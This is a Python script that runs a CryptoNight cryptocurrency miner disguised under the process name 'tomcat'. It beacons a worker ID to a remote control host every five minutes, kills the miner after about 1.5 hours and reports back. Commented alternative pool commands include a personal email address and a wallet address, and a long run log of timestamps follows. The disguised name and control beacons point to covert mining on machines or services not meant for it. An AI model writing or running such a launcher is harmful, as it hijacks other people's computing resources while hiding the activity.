import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:07.399546
#2018-02-17 16:05:01.413479
#2018-02-17 17:52:06.839258
#2018-02-17 19:41:04.289571
#2018-02-17 21:29:02.151372
#2018-02-17 23:13:07.885713
#2018-02-18 01:00:08.039617
#2018-02-18 02:48:03.714538
#2018-02-18 04:37:04.920963
#2018-02-18 06:28:06.157809
#2018-02-18 08:17:05.755012
#2018-02-18 10:05:08.625564
#2018-02-18 11:51:05.937112
#2018-02-18 13:36:02.155300
#2018-02-18 15:26:03.880260
#2018-02-18 17:14:06.266287
#2018-02-18 19:02:05.187160
#2018-02-18 20:49:05.794296
#2018-02-18 22:36:04.901227
#2018-02-19 00:24:04.517190
#2018-02-19 02:10:08.741810
#2018-02-19 03:57:05.089070
#2018-02-19 05:42:02.506835
#2018-02-19 07:29:03.497237
#2018-02-19 09:18:08.522771
#2018-02-19 11:07:07.535562
#2018-02-19 12:55:08.539369
#2018-02-19 14:42:01.575027
#2018-02-19 16:29:03.712919
#2018-02-19 18:15:09.129868
#2018-02-19 20:03:01.766990
#2018-02-19 21:51:07.912617
#2018-02-19 23:38:03.603914
#2018-02-20 01:23:05.851065
#2018-02-20 03:13:06.658737
#2018-02-20 05:00:10.701812
#2018-02-20 06:44:08.413200
#2018-02-20 08:31:04.873603
#2018-02-20 10:15:01.529598
#2018-02-20 11:59:04.191388
#2018-02-20 13:46:05.727376
#2018-02-20 15:33:06.660925
#2018-02-20 17:20:04.936992
#2018-02-20 19:09:07.213373
#2018-02-20 20:59:05.946084
#2018-02-20 22:45:09.362789
#2018-02-21 00:29:05.033076
#2018-02-21 02:16:08.581858
#2018-02-21 04:05:04.628406
#2018-02-21 05:52:04.388200
#2018-02-21 07:40:07.044101
#2018-02-21 09:24:07.833381
#2018-02-21 11:13:01.698227
#2018-02-21 13:02:08.367022
#2018-02-21 14:49:04.555207
#2018-02-21 16:36:09.891454
#2018-02-21 18:26:05.744095
#2018-02-21 20:12:01.319903
#2018-02-21 21:59:08.761580
#2018-02-21 23:47:01.772835
#2018-02-22 01:35:01.587935
#2018-02-22 03:22:06.665878
#2018-02-22 05:09:06.362216
#2018-02-22 06:53:04.085675
#2018-02-22 08:40:08.608733
#2018-02-22 10:27:03.973444
#2018-02-22 12:12:04.008769
#2018-02-22 13:57:02.039837
#2018-02-22 15:44:11.975991
#2018-02-22 17:31:01.459727
#2018-02-22 19:17:09.156741
#2018-02-22 21:10:06.803424
#2018-02-22 22:54:05.866127
#2018-02-23 00:42:03.980285
#2018-02-23 02:28:01.624010
#2018-02-23 04:17:01.744154
#2018-02-23 06:02:06.163668
#2018-02-23 07:49:05.004934
#2018-02-23 09:49:01.913446
#2018-02-23 11:53:11.421399
#2018-02-23 13:42:06.874324
#2018-02-23 15:31:08.770346
#2018-02-23 17:21:05.553473
#2018-02-23 19:06:07.639461
#2018-02-23 20:51:07.073646
#2018-02-23 22:41:03.397005
#2018-02-24 00:27:06.532001
#2018-02-24 02:18:04.349973
#2018-02-24 04:07:07.443707
#2018-02-24 05:53:07.806757
#2018-02-24 07:42:07.218552
#2018-02-24 09:27:07.527950
#2018-02-24 11:21:05.510425
#2018-02-24 13:10:07.086801
#2018-02-24 15:00:07.045698
#2018-02-24 16:50:08.200529
#2018-02-24 18:39:01.421338
#2018-02-24 20:29:04.743235
#2018-02-24 22:26:05.937743
#2018-02-25 01:35:06.153084
#2018-02-25 04:29:03.982848
#2018-02-25 07:23:05.564545
#2018-02-25 11:40:05.566994
#2018-02-25 14:05:03.892204
#2018-02-25 15:39:01.926561